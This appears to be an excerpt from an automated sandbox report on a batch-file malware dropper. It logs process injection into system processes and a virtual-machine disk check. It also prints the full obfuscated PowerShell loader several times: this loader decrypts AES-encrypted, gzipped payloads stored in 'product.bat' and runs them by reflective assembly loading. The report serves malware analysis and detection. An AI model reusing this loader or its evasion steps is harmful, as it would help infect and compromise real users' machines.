Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A8C180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242BF650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2578F260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B68BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E591C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1A6A2460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EB0CEB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A5970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A59A0000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhvna($zvdeq){ $tqyfy=[system.security.cryptography.aes]::create(); $tqyfy.mode=[system.security.cryptography.ciphermode]::cbc; $tqyfy.padding=[system.security.cryptography.paddingmode]::pkcs7; $tqyfy.key=[system.convert]::frombase64string('axhrlwljv4pwkbof9iaijflo6glezt+6bkch3ruytca='); $tqyfy.iv=[system.convert]::frombase64string('txavkyk6lzidmpmpv8o+4q=='); $bqynp=$tqyfy.createdecryptor(); $fzhat=$bqynp.transformfinalblock($zvdeq, 0, $zvdeq.length); $bqynp.dispose(); $tqyfy.dispose(); $fzhat;}function fpymp($zvdeq){ invoke-expression '$fegds=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$zvdeq);'.replace('*', ''); invoke-expression '$xpqra=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$mcrfz=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fegds, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $mcrfz.copyto($xpqra); $mcrfz.dispose(); $fegds.dispose(); $xpqra.dispose(); $xpqra.toarray();}function zhrkt($zvdeq,$ulmvt){ invoke-expression '$ktvmp=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$zvdeq);'.replace('*', ''); invoke-expression '$apgun=$ktvmp.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$apgun.*i*n*v*o*k*e*($null, $ulmvt);'.replace('*', '');}$sqotv = 'c:\users\user\desktop\product.bat';$host.ui.rawui.windowtitle = $sqotv;$kfksq=[system.io.file]::readalltext($sqotv).split([environment]::newline);foreach ($vmudf in $kfksq) { if ($vmudf.startswith('iecms')) { $hjzkz=$vmudf.substring(5); break; }}$brzqf=[string[]]$hjzkz.split('\');invoke-expression '$sti = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$jnt = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$upd = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');zhrkt $sti $null;zhrkt $jnt $null;zhrkt $upd (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhvna($zvdeq){ $tqyfy=[system.security.cryptography.aes]::create(); $tqyfy.mode=[system.security.cryptography.ciphermode]::cbc; $tqyfy.padding=[system.security.cryptography.paddingmode]::pkcs7; $tqyfy.key=[system.convert]::frombase64string('axhrlwljv4pwkbof9iaijflo6glezt+6bkch3ruytca='); $tqyfy.iv=[system.convert]::frombase64string('txavkyk6lzidmpmpv8o+4q=='); $bqynp=$tqyfy.createdecryptor(); $fzhat=$bqynp.transformfinalblock($zvdeq, 0, $zvdeq.length); $bqynp.dispose(); $tqyfy.dispose(); $fzhat;}function fpymp($zvdeq){ invoke-expression '$fegds=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$zvdeq);'.replace('*', ''); invoke-expression '$xpqra=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$mcrfz=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fegds, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $mcrfz.copyto($xpqra); $mcrfz.dispose(); $fegds.dispose(); $xpqra.dispose(); $xpqra.toarray();}function zhrkt($zvdeq,$ulmvt){ invoke-expression '$ktvmp=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$zvdeq);'.replace('*', ''); invoke-expression '$apgun=$ktvmp.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$apgun.*i*n*v*o*k*e*($null, $ulmvt);'.replace('*', '');}$sqotv = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $sqotv;$kfksq=[system.io.file]::readalltext($sqotv).split([environment]::newline);foreach ($vmudf in $kfksq) { if ($vmudf.startswith('iecms')) { $hjzkz=$vmudf.substring(5); break; }}$brzqf=[string[]]$hjzkz.split('\');invoke-expression '$sti = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$jnt = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$upd = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');zhrkt $sti $null;zhrkt $jnt $null;zhrkt $upd (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhvna($zvdeq){ $tqyfy=[system.security.cryptography.aes]::create(); $tqyfy.mode=[system.security.cryptography.ciphermode]::cbc; $tqyfy.padding=[system.security.cryptography.paddingmode]::pkcs7; $tqyfy.key=[system.convert]::frombase64string('axhrlwljv4pwkbof9iaijflo6glezt+6bkch3ruytca='); $tqyfy.iv=[system.convert]::frombase64string('txavkyk6lzidmpmpv8o+4q=='); $bqynp=$tqyfy.createdecryptor(); $fzhat=$bqynp.transformfinalblock($zvdeq, 0, $zvdeq.length); $bqynp.dispose(); $tqyfy.dispose(); $fzhat;}function fpymp($zvdeq){ invoke-expression '$fegds=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$zvdeq);'.replace('*', ''); invoke-expression '$xpqra=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$mcrfz=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fegds, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $mcrfz.copyto($xpqra); $mcrfz.dispose(); $fegds.dispose(); $xpqra.dispose(); $xpqra.toarray();}function zhrkt($zvdeq,$ulmvt){ invoke-expression '$ktvmp=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$zvdeq);'.replace('*', ''); invoke-expression '$apgun=$ktvmp.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$apgun.*i*n*v*o*k*e*($null, $ulmvt);'.replace('*', '');}$sqotv = 'c:\users\user\desktop\product.bat';$host.ui.rawui.windowtitle = $sqotv;$kfksq=[system.io.file]::readalltext($sqotv).split([environment]::newline);foreach ($vmudf in $kfksq) { if ($vmudf.startswith('iecms')) { $hjzkz=$vmudf.substring(5); break; }}$brzqf=[string[]]$hjzkz.split('\');invoke-expression '$sti = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$jnt = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$upd = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');zhrkt $sti $null;zhrkt $jnt $null;zhrkt $upd (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhvna($zvdeq){ $tqyfy=[system.security.cryptography.aes]::create(); $tqyfy.mode=[system.security.cryptography.ciphermode]::cbc; $tqyfy.padding=[system.security.cryptography.paddingmode]::pkcs7; $tqyfy.key=[system.convert]::frombase64string('axhrlwljv4pwkbof9iaijflo6glezt+6bkch3ruytca='); $tqyfy.iv=[system.convert]::frombase64string('txavkyk6lzidmpmpv8o+4q=='); $bqynp=$tqyfy.createdecryptor(); $fzhat=$bqynp.transformfinalblock($zvdeq, 0, $zvdeq.length); $bqynp.dispose(); $tqyfy.dispose(); $fzhat;}function fpymp($zvdeq){ invoke-expression '$fegds=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$zvdeq);'.replace('*', ''); invoke-expression '$xpqra=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$mcrfz=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fegds, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $mcrfz.copyto($xpqra); $mcrfz.dispose(); $fegds.dispose(); $xpqra.dispose(); $xpqra.toarray();}function zhrkt($zvdeq,$ulmvt){ invoke-expression '$ktvmp=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$zvdeq);'.replace('*', ''); invoke-expression '$apgun=$ktvmp.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$apgun.*i*n*v*o*k*e*($null, $ulmvt);'.replace('*', '');}$sqotv = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $sqotv;$kfksq=[system.io.file]::readalltext($sqotv).split([environment]::newline);foreach ($vmudf in $kfksq) { if ($vmudf.startswith('iecms')) { $hjzkz=$vmudf.substring(5); break; }}$brzqf=[string[]]$hjzkz.split('\');invoke-expression '$sti = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$jnt = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$upd = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');zhrkt $sti $null;zhrkt $jnt $null;zhrkt $upd (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_0000000140002300
Source: dwm.exe, 00000012.00000000.1420829441.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000012.00000002.3404041850.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
Source: winlogon.exe, 0000000F.00000000.1415619225.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000F.00000002.3375598042.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000012.00000000.1422698641.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\winlogon.exeCode function: 15_3_000001CA7D1C2AF0 cpuid 15_3_000001CA7D1C2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
